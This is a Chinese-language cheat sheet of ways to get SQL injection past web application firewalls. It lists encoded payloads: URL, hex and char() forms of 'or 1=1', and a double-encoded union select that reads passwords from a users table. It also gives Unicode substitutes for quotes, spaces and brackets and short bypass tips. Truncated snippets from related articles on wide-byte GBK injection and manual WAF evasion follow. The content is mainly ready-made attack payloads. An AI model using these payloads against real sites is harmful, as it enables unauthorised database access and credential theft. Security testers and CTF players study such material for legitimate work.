1.內聯繞過
2.編碼繞過,如urlencode編碼,ascii,hex,unicode編碼繞過
or 1=1即%6f%72%20%31%3d%31,而test也可以為char(101)+char(97)+char(115)+char(116)。
十六進製制編碼
select(extractvalue(0x3c613e61646d696e3c2f613e,0x2f61))
雙重編碼繞過
?id=1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,password%252f%252a*/from%252f%252a*/users--+
一些unicode編碼舉例:
單引號:'
%u0027 %u02b9 %u02bc
%u02c8 %u2032
%uff07 %c0%27
%c0%a7 %e0%80%a7
空白:%u0020 %uff00
%c0%20 %c0%a0 %e0%80%a0
左括號(:
%u0028 %uff08
%c0%28 %c0%a8
%e0%80%a8
右括號):
%u0029 %uff09
%c0%29 %c0%a9
%e0%80%a9
3.提交方式繞過,有的只過濾了get卻未對post進行過濾
4.括號繞過空格:
參考文章:
sql注入繞過姿勢總結
常用的注釋符有 1 注釋內容 2 注釋內容 3 注釋內容 eg union select 1,2 union select 1,2 構造閉合 union select 1,2 常用於 waf的正則對大小寫不敏感的情況。eg union select 1,2 內聯注釋就是把一些特有的僅在mysql上的...
mysql注入轉義繞過 SQL注入防禦繞過
一 寬位元組注入 1 什麼是寬位元組 gb2312 gbk gb18030 big5等這些都是常說的寬位元組,實際為兩位元組 2 寬位元組注入原理 防禦 將 轉換為 繞過 將 消滅 mysql在使用gbk編碼的時候,會認為兩個字元為乙個漢字 編碼為 5c 編碼為 27 df 5c mysql會認為是...
mysql手工注入繞過 sql注入繞過WAF
這幾天的ctf題中有好幾道題都是sql注入的,但都存在waf需要繞過,於是整理了一些常見的繞過waf注入的方法。在現實sql注入中我們也常常碰到waf,那麼掌握常見的繞過很有必要。0x01 手工注入繞過 1 大小寫混合例如 union select 1,2,3,4 只適用於針對大小寫關鍵字的匹配 2...